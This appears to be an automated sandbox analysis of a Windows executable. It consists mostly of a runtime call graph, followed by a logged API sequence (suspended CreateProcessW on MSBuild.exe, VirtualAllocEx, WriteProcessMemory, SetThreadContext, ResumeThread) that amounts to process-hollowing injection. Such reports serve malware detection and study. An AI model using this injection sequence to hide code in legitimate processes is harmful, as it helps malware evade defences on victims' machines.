___scrt_is_nonwritable_in_current_image 23634->23635 23646 997594 EnterCriticalSection 23635->23646 23637 99c733 23647 9a2588 23637->23647 23644 99c862 2 API calls 23645 99c751 23644->23645 23666 99c777 23645->23666 23646->23637 23648 9a2594 ___scrt_is_nonwritable_in_current_image 23647->23648 23649 9a25be 23648->23649 23650 9a259d 23648->23650 23669 997594 EnterCriticalSection 23649->23669 23651 996bb1 __Wcrtomb 14 API calls 23650->23651 23653 9a25a2 23651->23653 23654 99729c __strnicoll 29 API calls 23653->23654 23655 99c742 23654->23655 23655->23645 23660 99c7ac GetStartupInfoW 23655->23660 23656 9a25f6 23677 9a261d 23656->23677 23658 9a25ca 23658->23656 23670 9a24d8 23658->23670 23661 99c7c9 23660->23661 23662 99c74c 23660->23662 23661->23662 23663 9a2588 30 API calls 23661->23663 23662->23644 23664 99c7f1 23663->23664 23664->23662 23665 99c821 GetFileType 23664->23665 23665->23664 23686 9975ab LeaveCriticalSection 23666->23686 23668 99c762 23669->23658 23671 99c0e0 __Getctype 14 API calls 23670->23671 23673 9a24ea 23671->23673 23672 9a24f7 23674 99ad27 ___free_lconv_mon 14 API calls 23672->23674 23673->23672 23680 99bac7 23673->23680 23676 9a254c 23674->23676 23676->23658 23685 9975ab LeaveCriticalSection 23677->23685 23679 9a2624 23679->23655 23681 99be0d std::_Lockit::_Lockit 5 API calls 23680->23681 23682 99bae3 23681->23682 23683 99bb01 InitializeCriticalSectionAndSpinCount 23682->23683 23684 99baec 23682->23684 23683->23684 23684->23673 23685->23679 23686->23668 22326 991e3e 22327 997a0d ___scrt_uninitialize_crt 68 API calls 22326->22327 22328 991e46 22327->22328 22336 99d5b7 22328->22336 22330 991e4b 22346 99d662 22330->22346 22333 991e75 22334 99ad27 ___free_lconv_mon 14 API calls 22333->22334 22335 991e80 22334->22335 22337 99d5c3 ___scrt_is_nonwritable_in_current_image 22336->22337 22350 997594 EnterCriticalSection 22337->22350 22339 99d5ce 22340 99d63a 22339->22340 22342 99d60e DeleteCriticalSection 22339->22342 22351 997865 22339->22351 22355 99d659 22340->22355 22345 99ad27 ___free_lconv_mon 14 API calls 22342->22345 22345->22339 22347 99d679 22346->22347 22348 991e5a DeleteCriticalSection 22346->22348 22347->22348 22349 99ad27 ___free_lconv_mon 14 API calls 22347->22349 22348->22330 22348->22333 22349->22348 22350->22339 22352 997878 _Fputc 22351->22352 22358 997923 22352->22358 22354 997884 _Fputc 22354->22339 22430 9975ab LeaveCriticalSection 22355->22430 22357 99d646 22357->22330 22359 99792f ___scrt_is_nonwritable_in_current_image 22358->22359 22360 997939 22359->22360 22361 99795c 22359->22361 22362 997445 _Fputc 29 API calls 22360->22362 22368 997954 22361->22368 22369 991d4e EnterCriticalSection 22361->22369 22362->22368 22364 99797a 22370 997895 22364->22370 22366 997987 22384 9979b2 22366->22384 22368->22354 22369->22364 22371 9978a2 22370->22371 22372 9978c5 22370->22372 22373 997445 _Fputc 29 API calls 22371->22373 22374 997a7b ___scrt_uninitialize_crt 64 API calls 22372->22374 22375 9978bd 22372->22375 22373->22375 22376 9978dd 22374->22376 22375->22366 22377 99d662 14 API calls 22376->22377 22378 9978e5 22377->22378 22379 99e509 _Ungetc 29 API calls 22378->22379 22380 9978f1 22379->22380 22387 9a2a87 22380->22387 22383 99ad27 ___free_lconv_mon 14 API calls 22383->22375 22429 991d62 LeaveCriticalSection 22384->22429 22386 9979b8 22386->22368 22388 9a2ab0 22387->22388 22393 9978f8 22387->22393 22389 9a2aff 22388->22389 22391 9a2ad7 22388->22391 22390 997445 _Fputc 29 API calls 22389->22390 22390->22393 22394 9a2b2a 22391->22394 22393->22375 22393->22383 22395 9a2b36 ___scrt_is_nonwritable_in_current_image 22394->22395 22402 9a2626 EnterCriticalSection 22395->22402 22397 9a2b44 22398 9a2b75 22397->22398 22403 9a29e7 22397->22403 22416 9a2baf 22398->22416 22402->22397 22404 9a23dd _Fputc 29 API calls 22403->22404 22406 9a29f7 22404->22406 22405 9a29fd 22419 9a2447 22405->22419 22406->22405 22407 9a2a2f 22406->22407 22409 9a23dd _Fputc 29 API calls 22406->22409 22407->22405 22410 9a23dd _Fputc 29 API calls 22407->22410 22411 9a2a26 22409->22411 22412 9a2a3b CloseHandle 22410->22412 22413 9a23dd _Fputc 29 API calls 22411->22413 22412->22405 22414 9a2a47 GetLastError 22412->22414 22413->22407 22414->22405 22415 9a2a55 _Fputc 22415->22398 22428 9a2649 LeaveCriticalSection 22416->22428 22418 9a2b98 22418->22393 22420 9a24bd 22419->22420 22422 9a2456 22419->22422 22421 996bb1 __Wcrtomb 14 API calls 22420->22421 22423 9a24c2 22421->22423 22422->22420 22427 9a2480 22422->22427 22424 996bc4 __dosmaperr 14 API calls 22423->22424 22425 9a24ad 22424->22425 22425->22415 22426 9a24a7 SetStdHandle 22426->22425 22427->22425 22427->22426 22428->22418 22429->22386 22430->22357 22453 98d02a 22454 98d036 __EH_prolog3_GS 22453->22454 22456 98d088 22454->22456 22457 98d0a2 22454->22457 22461 98d050 22454->22461 22455 98e76e std::_Throw_Cpp_error 5 API calls 22458 98d179 22455->22458 22469 98c960 22456->22469 22472 997d1d 22457->22472 22461->22455 22463 982c50 std::_Throw_Cpp_error 29 API calls 22463->22461 22464 98d15e 22464->22463 22465 98d0c1 22465->22464 22467 997d1d 45 API calls 22465->22467 22468 98d198 22465->22468 22492 98c4e3 22465->22492 22467->22465 22468->22464 22496 999277 22468->22496 22509 997ed8 22469->22509 22473 997d29 ___scrt_is_nonwritable_in_current_image 22472->22473 22474 997d4b 22473->22474 22475 997d33 22473->22475 22796 991d4e EnterCriticalSection 22474->22796 22476 996bb1 __Wcrtomb 14 API calls 22475->22476 22478 997d38 22476->22478 22480 99729c __strnicoll 29 API calls 22478->22480 22479 997d56 22481 99e509 _Ungetc 29 API calls 22479->22481 22484 997d6e 22479->22484 22491 997d43 22480->22491 22481->22484 22482 997dfe 22797 997e36 22482->22797 22483 997dd6 22485 996bb1 __Wcrtomb 14 API calls 22483->22485 22484->22482 22484->22483 22487 997ddb 22485->22487 22489 99729c __strnicoll 29 API calls 22487->22489 22488 997e04 22807 997e2e 22488->22807 22489->22491 22491->22465 22493 98c517 22492->22493 22495 98c4f3 22492->22495 22811 98d85c 22493->22811 22495->22465 22497 999283 ___scrt_is_nonwritable_in_current_image 22496->22497 22498 99928a 22497->22498 22499 99929f 22497->22499 22500 996bb1 __Wcrtomb 14 API calls 22498->22500 22849 991d4e EnterCriticalSection 22499->22849 22502 99928f 22500->22502 22504 99729c __strnicoll 29 API calls 22502->22504 22503 9992a9 22850 9992ea 22503->22850 22506 99929a 22504->22506 22506->22468 22510 997ee4 ___scrt_is_nonwritable_in_current_image 22509->22510 22511 997eeb 22510->22511 22512 997f02 22510->22512 22513 996bb1 __Wcrtomb 14 API calls 22511->22513 22522 991d4e EnterCriticalSection 22512->22522 22515 997ef0 22513->22515 22517 99729c __strnicoll 29 API calls 22515->22517 22516 997f0e 22523 997f4f 22516->22523 22520 98c96b 22517->22520 22520->22461 22522->22516 22524 997f6c 22523->22524 22525 997fd2 22523->22525 22527 99e509 _Ungetc 29 API calls 22524->22527 22526 998099 22525->22526 22529 99e509 _Ungetc 29 API calls 22525->22529 22559 997f19 22526->22559 22583 9a37ef 22526->22583 22528 997f72 22527->22528 22530 997f95 22528->22530 22533 99e509 _Ungetc 29 API calls 22528->22533 22531 997fe7 22529->22531 22530->22525 22545 997fb0 22530->22545 22534 99800a 22531->22534 22536 99e509 _Ungetc 29 API calls 22531->22536 22535 997f7e 22533->22535 22534->22526 22537 998021 22534->22537 22535->22530 22541 99e509 _Ungetc 29 API calls 22535->22541 22538 997ff3 22536->22538 22539 997e72 43 API calls 22537->22539 22538->22534 22544 99e509 _Ungetc 29 API calls 22538->22544 22540 99802a 22539->22540 22540->22559 22574 991eb5 22540->22574 22543 997f8a 22541->22543 22547 99e509 _Ungetc 29 API calls 22543->22547 22548 997fff 22544->22548 22545->22559 22563 997e72 22545->22563 22547->22530 22550 99e509 _Ungetc 29 API calls 22548->22550 22550->22534 22551 99806c 22579 99e39f 22551->22579 22552 997e72 43 API calls 22554 998053 22552->22554 22554->22551 22556 998059 22554->22556 22555 998080 22557 996bb1 __Wcrtomb 14 API calls 22555->22557 22555->22559 22558 999277 31 API calls 22556->22558 22557->22559 22558->22559 22560 997f47 22559->22560 22795 991d62 LeaveCriticalSection 22560->22795 22562 997f4d 22562->22520 22564 997e36 22563->22564 22565 997e42 22564->22565 22566 997e57 22564->22566 22568 996bb1 __Wcrtomb 14 API calls 22565->22568 22567 997e66 22566->22567 22604 9a37e4 22566->22604 22567->22545 22570 997e47 22568->22570 22571 99729c __strnicoll 29 API calls 22570->22571 22573 997e52 22571->22573 22573->22545 22575 99afb3 __Getctype 39 API calls 22574->22575 22576 991ec0 22575->22576 22577 99b596 __Getctype 39 API calls 22576->22577 22578 991ed0 22577->22578 22578->22551 22578->22552 22580 99e3b2 _Fputc 22579->22580 22762 99e3d6 22580->22762 22582 99e3c4 _Fputc 22582->22555 22584 9a3989 22583->22584 22585 9a3998 22584->22585 22589 9a39ad 22584->22589 22586 996bb1 __Wcrtomb 14 API calls 22585->22586 22587 9a399d 22586->22587 22588 99729c __strnicoll 29 API calls 22587->22588 22597 9a39a8 22588->22597 22590 9a3a0b 22589->22590 22591 9a512f _Ungetc 14 API calls 22589->22591 22589->22597 22592 99e509 _Ungetc 29 API calls 22590->22592 22591->22590 22593 9a3a3b 22592->22593 22594 9a8983 43 API calls 22593->22594 22595 9a3a43 22594->22595 22596 99e509 _Ungetc 29 API calls 22595->22596 22595->22597 22598 9a3a7d 22596->22598 22597->22559 22598->22597 22599 99e509 _Ungetc 29 API calls 22598->22599 22600 9a3a8b 22599->22600 22600->22597 22601 99e509 _Ungetc 29 API calls 22600->22601 22602 9a3a99 22601->22602 22603 99e509 _Ungetc 29 API calls 22602->22603 22603->22597 22605 9a37fa 22604->22605 22606 9a3807 22605->22606 22609 9a381f 22605->22609 22607 996bb1 __Wcrtomb 14 API calls 22606->22607 22608 9a380c 22607->22608 22610 99729c __strnicoll 29 API calls 22608->22610 22611 9a387e 22609->22611 22612 997e63 22609->22612 22625 9a512f 22609->22625 22610->22612 22614 99e509 _Ungetc 29 API calls 22611->22614 22612->22545 22615 9a3897 22614->22615 22630 9a8983 22615->22630 22618 99e509 _Ungetc 29 API calls 22619 9a38d0 22618->22619 22619->22612 22620 99e509 _Ungetc 29 API calls 22619->22620 22621 9a38de 22620->22621 22621->22612 22622 99e509 _Ungetc 29 API calls 22621->22622 22623 9a38ec 22622->22623 22624 99e509 _Ungetc 29 API calls 22623->22624 22624->22612 22626 99c0e0 __Getctype 14 API calls 22625->22626 22627 9a514c 22626->22627 22628 99ad27 ___free_lconv_mon 14 API calls 22627->22628 22629 9a5156 22628->22629 22629->22611 22631 9a898f ___scrt_is_nonwritable_in_current_image 22630->22631 22632 9a8997 22631->22632 22636 9a89b2 22631->22636 22633 996bc4 __dosmaperr 14 API calls 22632->22633 22634 9a899c 22633->22634 22637 996bb1 __Wcrtomb 14 API calls 22634->22637 22635 9a89c9 22638 996bc4 __dosmaperr 14 API calls 22635->22638 22636->22635 22639 9a8a04 22636->22639 22659 9a389f 22637->22659 22642 9a89ce 22638->22642 22640 9a8a0d 22639->22640 22641 9a8a22 22639->22641 22643 996bc4 __dosmaperr 14 API calls 22640->22643 22660 9a2626 EnterCriticalSection 22641->22660 22645 996bb1 __Wcrtomb 14 API calls 22642->22645 22646 9a8a12 22643->22646 22648 9a89d6 22645->22648 22649 996bb1 __Wcrtomb 14 API calls 22646->22649 22647 9a8a28 22650 9a8a5c 22647->22650 22651 9a8a47 22647->22651 22653 99729c __strnicoll 29 API calls 22648->22653 22649->22648 22661 9a8a9c 22650->22661 22652 996bb1 __Wcrtomb 14 API calls 22651->22652 22655 9a8a4c 22652->22655 22653->22659 22657 996bc4 __dosmaperr 14 API calls 22655->22657 22656 9a8a57 22724 9a8a94 22656->22724 22657->22656 22659->22612 22659->22618 22660->22647 22662 9a8aae 22661->22662 22663 9a8ac6 22661->22663 22664 996bc4 __dosmaperr 14 API calls 22662->22664 22665 9a8e08 22663->22665 22670 9a8b09 22663->22670 22666 9a8ab3 22664->22666 22667 996bc4 __dosmaperr 14 API calls 22665->22667 22668 996bb1 __Wcrtomb 14 API calls 22666->22668 22669 9a8e0d 22667->22669 22671 9a8abb 22668->22671 22672 996bb1 __Wcrtomb 14 API calls 22669->22672 22670->22671 22673 9a8b14 22670->22673 22677 9a8b44 22670->22677 22671->22656 22674 9a8b21 22672->22674 22675 996bc4 __dosmaperr 14 API calls 22673->22675 22678 99729c __strnicoll 29 API calls 22674->22678 22676 9a8b19 22675->22676 22679 996bb1 __Wcrtomb 14 API calls 22676->22679 22680 9a8b5d 22677->22680 22681 9a8b6a 22677->22681 22682 9a8b98 22677->22682 22678->22671 22679->22674 22680->22681 22716 9a8b86 22680->22716 22683 996bc4 __dosmaperr 14 API calls 22681->22683 22684 99ad61 __strnicoll 15 API calls 22682->22684 22685 9a8b6f 22683->22685 22686 9a8ba9 22684->22686 22687 996bb1 __Wcrtomb 14 API calls 22685->22687 22689 99ad27 ___free_lconv_mon 14 API calls 22686->22689 22690 9a8b76 22687->22690 22692 9a8bb2 22689->22692 22693 99729c __strnicoll 29 API calls 22690->22693 22691 9a8ce4 22694 9a8d58 22691->22694 22697 9a8cfd GetConsoleMode 22691->22697 22695 99ad27 ___free_lconv_mon 14 API calls 22692->22695 22723 9a8b81 22693->22723 22696 9a8d5c ReadFile 22694->22696 22698 9a8bb9 22695->22698 22699 9a8dd0 GetLastError 22696->22699 22700 9a8d74 22696->22700 22697->22694 22701 9a8d0e 22697->22701 22702 9a8bde 22698->22702 22703 9a8bc3 22698->22703 22704 9a8ddd 22699->22704 22705 9a8d34 22699->22705 22700->22699 22711 9a8d4d 22700->22711 22701->22696 22706 9a8d14 ReadConsoleW 22701->22706 22710 9a1720 31 API calls 22702->22710 22708 996bb1 __Wcrtomb 14 API calls 22703->22708 22709 996bb1 __Wcrtomb 14 API calls 22704->22709 22713 996bd7 __dosmaperr 14 API calls 22705->22713 22705->22723 22706->22711 22712 9a8d2e GetLastError 22706->22712 22707 99ad27 ___free_lconv_mon 14 API calls 22707->22671 22714 9a8bc8 22708->22714 22715 9a8de2 22709->22715 22710->22716 22719 9a8d99 22711->22719 22720 9a8db0 22711->22720 22711->22723 22712->22705 22713->22723 22717 996bc4 __dosmaperr 14 API calls 22714->22717 22718 996bc4 __dosmaperr 14 API calls 22715->22718 22727 9a5dc4 22716->22727 22717->22723 22718->22723 22736 9a8ea5 22719->22736 22720->22723 22749 9a9149 22720->22749 22723->22707 22761 9a2649 LeaveCriticalSection 22724->22761 22726 9a8a9a 22726->22659 22728 9a5dde 22727->22728 22729 9a5dd1 22727->22729 22732 9a5dea 22728->22732 22733 996bb1 __Wcrtomb 14 API calls 22728->22733 22730 996bb1 __Wcrtomb 14 API calls 22729->22730 22731 9a5dd6 22730->22731 22731->22691 22732->22691 22734 9a5e0b 22733->22734 22735 99729c __strnicoll 29 API calls 22734->22735 22735->22731 22755 9a8ffc 22736->22755 22738 99adaf __strnicoll MultiByteToWideChar 22740 9a8fb9 22738->22740 22743 9a8fc2 GetLastError 22740->22743 22746 9a8eed 22740->22746 22741 9a8f47 22747 9a8f01 22741->22747 22748 9a1720 31 API calls 22741->22748 22742 9a8f37 22744 996bb1 __Wcrtomb 14 API calls 22742->22744 22745 996bd7 __dosmaperr 14 API calls 22743->22745 22744->22746 22745->22746 22746->22723 22747->22738 22748->22747 22750 9a9183 22749->22750 22751 9a9219 ReadFile 22750->22751 22752 9a9214 22750->22752 22751->22752 22753 9a9236 22751->22753 22752->22723 22753->22752 22754 9a1720 31 API calls 22753->22754 22754->22752 22756 9a9030 22755->22756 22757 9a90a1 ReadFile 22756->22757 22758 9a8ebc 22756->22758 22757->22758 22759 9a90ba 22757->22759 22758->22741 22758->22742 22758->22746 22758->22747 22759->22758 22760 9a1720 31 API calls 22759->22760 22760->22758 22761->22726 22763 99e3ea 22762->22763 22772 99e3fa 22762->22772 22764 99e41f 22763->22764 22763->22772 22774 9921e0 22763->22774 22766 99e430 22764->22766 22767 99e453 22764->22767 22780 9a7902 22766->22780 22769 99e47b 22767->22769 22770 99e4cf 22767->22770 22767->22772 22769->22772 22773 99adaf __strnicoll MultiByteToWideChar 22769->22773 22771 99adaf __strnicoll MultiByteToWideChar 22770->22771 22771->22772 22772->22582 22773->22772 22775 9921f0 22774->22775 22783 99b5f0 22775->22783 22791 9a9e83 22780->22791 22784 99220d 22783->22784 22785 99b607 22783->22785 22787 99b621 22784->22787 22785->22784 22786 99f695 __Getctype 39 API calls 22785->22786 22786->22784 22788 99b638 22787->22788 22789 99221a 22787->22789 22788->22789 22790 99c912 __strnicoll 39 API calls 22788->22790 22789->22764 22790->22789 22792 9a9eb1 _Fputc 22791->22792 22793 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 22792->22793 22794 9a791d 22793->22794 22794->22772 22795->22562 22796->22479 22798 997e42 22797->22798 22799 997e57 22797->22799 22801 996bb1 __Wcrtomb 14 API calls 22798->22801 22800 997e66 22799->22800 22802 9a37e4 43 API calls 22799->22802 22800->22488 22803 997e47 22801->22803 22805 997e63 22802->22805 22804 99729c __strnicoll 29 API calls 22803->22804 22806 997e52 22804->22806 22805->22488 22806->22488 22810 991d62 LeaveCriticalSection 22807->22810 22809 997e34 22809->22491 22810->22809 22812 98d910 22811->22812 22813 98d880 22811->22813 22815 983240 std::_Throw_Cpp_error 30 API calls 22812->22815 22814 9832c0 std::_Throw_Cpp_error 5 API calls 22813->22814 22816 98d892 22814->22816 22817 98d915 22815->22817 22822 9834d0 22816->22822 22819 98d89d codecvt 22820 982e20 std::_Throw_Cpp_error 29 API calls 22819->22820 22821 98d8de codecvt 22819->22821 22820->22821 22821->22495 22823 9834ef 22822->22823 22824 9834e3 22822->22824 22825 9834fc 22823->22825 22826 98350f 22823->22826 22824->22819 22829 983550 22825->22829 22837 9835c0 22826->22837 22830 98356e 22829->22830 22831 983573 22829->22831 22840 9835e0 22830->22840 22833 9835c0 std::_Throw_Cpp_error 3 API calls 22831->22833 22834 98357e 22833->22834 22835 98358b 22834->22835 22844 9972ac 22834->22844 22835->22824 22838 98b9cb std::ios_base::_Init 3 API calls 22837->22838 22839 9835d2 22838->22839 22839->22824 22841 9835f8 std::ios_base::_Init 22840->22841 22842 98f0bd Concurrency::cancel_current_task RaiseException 22841->22842 22843 98360d 22842->22843 22845 9974eb __strnicoll 29 API calls 22844->22845 22846 9972bb 22845->22846 22847 9972c9 __Getctype 11 API calls 22846->22847 22848 9972c8 22847->22848 22849->22503 22851 999302 22850->22851 22853 999372 22850->22853 22852 99e509 _Ungetc 29 API calls 22851->22852 22857 999308 22852->22857 22854 9a512f _Ungetc 14 API calls 22853->22854 22855 9992b7 22853->22855 22854->22855 22861 9992e2 22855->22861 22856 99935a 22858 996bb1 __Wcrtomb 14 API calls 22856->22858 22857->22853 22857->22856 22859 99935f 22858->22859 22860 99729c __strnicoll 29 API calls 22859->22860 22860->22855 22864 991d62 LeaveCriticalSection 22861->22864 22863 9992e8 22863->22506 22864->22863 22919 99b258 22920 99b263 22919->22920 22921 99b273 22919->22921 22925 99b35d 22920->22925 22924 99ad27 ___free_lconv_mon 14 API calls 22924->22921 22926 99b372 22925->22926 22930 99b378 22925->22930 22927 99ad27 ___free_lconv_mon 14 API calls 22926->22927 22927->22930 22928 99ad27 ___free_lconv_mon 14 API calls 22929 99b384 22928->22929 22931 99ad27 ___free_lconv_mon 14 API calls 22929->22931 22930->22928 22932 99b38f 22931->22932 22933 99ad27 ___free_lconv_mon 14 API calls 22932->22933 22934 99b39a 22933->22934 22935 99ad27 ___free_lconv_mon 14 API calls 22934->22935 22936 99b3a5 22935->22936 22937 99ad27 ___free_lconv_mon 14 API calls 22936->22937 22938 99b3b0 22937->22938 22939 99ad27 ___free_lconv_mon 14 API calls 22938->22939 22940 99b3bb 22939->22940 22941 99ad27 ___free_lconv_mon 14 API calls 22940->22941 22942 99b3c6 22941->22942 22943 99ad27 ___free_lconv_mon 14 API calls 22942->22943 22944 99b3d1 22943->22944 22945 99ad27 ___free_lconv_mon 14 API calls 22944->22945 22946 99b3df 22945->22946 22951 99b4d6 22946->22951 22952 99b4e2 ___scrt_is_nonwritable_in_current_image 22951->22952 22967 997594 EnterCriticalSection 22952->22967 22955 99b4ec 22957 99ad27 ___free_lconv_mon 14 API calls 22955->22957 22958 99b516 22955->22958 22957->22958 22968 99b535 22958->22968 22959 99b541 22960 99b54d ___scrt_is_nonwritable_in_current_image 22959->22960 22972 997594 EnterCriticalSection 22960->22972 22962 99b557 22963 99b279 __Getctype 14 API calls 22962->22963 22964 99b56a 22963->22964 22973 99b58a 22964->22973 22967->22955 22971 9975ab LeaveCriticalSection 22968->22971 22970 99b405 22970->22959 22971->22970 22972->22962 22976 9975ab LeaveCriticalSection 22973->22976 22975 99b26b 22975->22924 22976->22975 24243 98d349 24244 98d358 24243->24244 24246 98d37c 24244->24246 24247 998a2d 24244->24247 24248 998a40 _Fputc 24247->24248 24251 998a9a 24248->24251 24250 998a55 _Fputc 24250->24246 24252 998aac 24251->24252 24253 998acf 24251->24253 24254 997445 _Fputc 29 API calls 24252->24254 24253->24252 24256 998af6 24253->24256 24255 998ac7 24254->24255 24255->24250 24259 998bd0 24256->24259 24260 998bdc ___scrt_is_nonwritable_in_current_image 24259->24260 24267 991d4e EnterCriticalSection 24260->24267 24262 998bea 24268 998b30 24262->24268 24264 998bf7 24277 998c1f 24264->24277 24267->24262 24269 997a7b ___scrt_uninitialize_crt 64 API calls 24268->24269 24270 998b4b 24269->24270 24271 99d662 14 API calls 24270->24271 24272 998b55 24271->24272 24273 99c0e0 __Getctype 14 API calls 24272->24273 24276 998b70 24272->24276 24274 998b94 24273->24274 24275 99ad27 ___free_lconv_mon 14 API calls 24274->24275 24275->24276 24276->24264 24280 991d62 LeaveCriticalSection 24277->24280 24279 998b2e 24279->24250 24280->24279 24329 98cf43 24330 98cf5e 24329->24330 24332 98cf70 24330->24332 24333 98c9a4 24330->24333 24336 9993de 24333->24336 24337 9993ea ___scrt_is_nonwritable_in_current_image 24336->24337 24338 999408 24337->24338 24339 9993f1 24337->24339 24349 991d4e EnterCriticalSection 24338->24349 24340 996bb1 __Wcrtomb 14 API calls 24339->24340 24342 9993f6 24340->24342 24344 99729c __strnicoll 29 API calls 24342->24344 24343 999417 24350 99945c 24343->24350 24346 98c9b6 24344->24346 24346->24332 24347 999425 24364 999454 24347->24364 24349->24343 24351 9994fc _Ungetc 24350->24351 24352 999472 24350->24352 24351->24347 24352->24351 24353 9994a0 24352->24353 24354 9a512f _Ungetc 14 API calls 24352->24354 24353->24351 24355 99e509 _Ungetc 29 API calls 24353->24355 24354->24353 24356 9994b2 24355->24356 24357 9994d5 24356->24357 24358 99e509 _Ungetc 29 API calls 24356->24358 24357->24351 24367 999512 24357->24367 24359 9994be 24358->24359 24359->24357 24361 99e509 _Ungetc 29 API calls 24359->24361 24362 9994ca 24361->24362 24363 99e509 _Ungetc 29 API calls 24362->24363 24363->24357 24394 991d62 LeaveCriticalSection 24364->24394 24366 99945a 24366->24346 24368 99e509 _Ungetc 29 API calls 24367->24368 24369 999535 24368->24369 24370 99e509 _Ungetc 29 API calls 24369->24370 24377 99955e 24369->24377 24372 999543 24370->24372 24371 999598 24378 98ba3f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 24371->24378 24374 99e509 _Ungetc 29 API calls 24372->24374 24372->24377 24375 999551 24374->24375 24376 99e509 _Ungetc 29 API calls 24375->24376 24376->24377 24377->24371 24380 99e1fb 24377->24380 24379 999616 24378->24379 24379->24351 24381 99e20e _Fputc 24380->24381 24384 99e235 24381->24384 24383 99e223 _Fputc 24383->24371 24385 99e24a 24384->24385 24386 99e28b 24385->24386 24387 9921e0 _Fputc 39 API calls 24385->24387 24392 99e24e std::invalid_argument::invalid_argument _Fputc 24385->24392 24393 99e277 std::invalid_argument::invalid_argument 24385->24393 24389 99ae71 _Fputc WideCharToMultiByte 24386->24389 24386->24392 24386->24393 24387->24386 24388 997445 _Fputc 29 API calls 24388->24392 24390 99e346 24389->24390 24391 99e35c GetLastError 24390->24391 24390->24392 24391->24392 24391->24393 24392->24383 24393->24388 24393->24392 24394->24366

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,009B6110,009B6100), ref: 009B6334
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 009B6347
                                                                                                        • Wow64GetThreadContext.KERNEL32(00000134,00000000), ref: 009B6365
                                                                                                        • ReadProcessMemory.KERNELBASE(00000130,?,009B6154,00000004,00000000), ref: 009B6389
                                                                                                        • VirtualAllocEx.KERNELBASE(00000130,?,?,00003000,00000040), ref: 009B63B4
                                                                                                        • TerminateProcess.KERNELBASE(00000130,00000000), ref: 009B63D3
                                                                                                        • WriteProcessMemory.KERNELBASE(00000130,00000000,?,?,00000000,?), ref: 009B640C
                                                                                                        • WriteProcessMemory.KERNELBASE(00000130,00400000,?,?,00000000,?,00000028), ref: 009B6457
                                                                                                        • WriteProcessMemory.KERNELBASE(00000130,?,?,00000004,00000000), ref: 009B6495
                                                                                                        • Wow64SetThreadContext.KERNEL32(00000134,028A0000), ref: 009B64D1
                                                                                                        • ResumeThread.KERNELBASE(00000134), ref: 009B64E0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                        • API String ID: 2440066154-3857624555
                                                                                                        • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                        • Instruction ID: 7a5ce893e3b804a7d66225cf1e6d7ac81b2d3f2b98a5d9145d79f0204d61ae5b
                                                                                                        • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                        • Instruction Fuzzy Hash: 5FB1087260064AAFDB60CF68CD80BDA77A5FF88724F158524EA0CAB341D774FA51CB94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 25 99bd42-99bd4e 26 99bde0-99bde3 25->26 27 99bde9 26->27 28 99bd53-99bd64 26->28 29 99bdeb-99bdef 27->29 30 99bd71-99bd8a LoadLibraryExW 28->30 31 99bd66-99bd69 28->31 34 99bd8c-99bd95 GetLastError 30->34 35 99bdf0-99be00 30->35 32 99be09-99be0b 31->32 33 99bd6f 31->33 32->29 37 99bddd 33->37 38 99bdce-99bddb 34->38 39 99bd97-99bda9 call 99f344 34->39 35->32 36 99be02-99be03 FreeLibrary 35->36 36->32 37->26 38->37 39->38 42 99bdab-99bdbd call 99f344 39->42 42->38 45 99bdbf-99bdcc LoadLibraryExW 42->45 45->35 45->38
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F1D6E486,?,0099BE51,?,?,00000000), ref: 0099BE03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
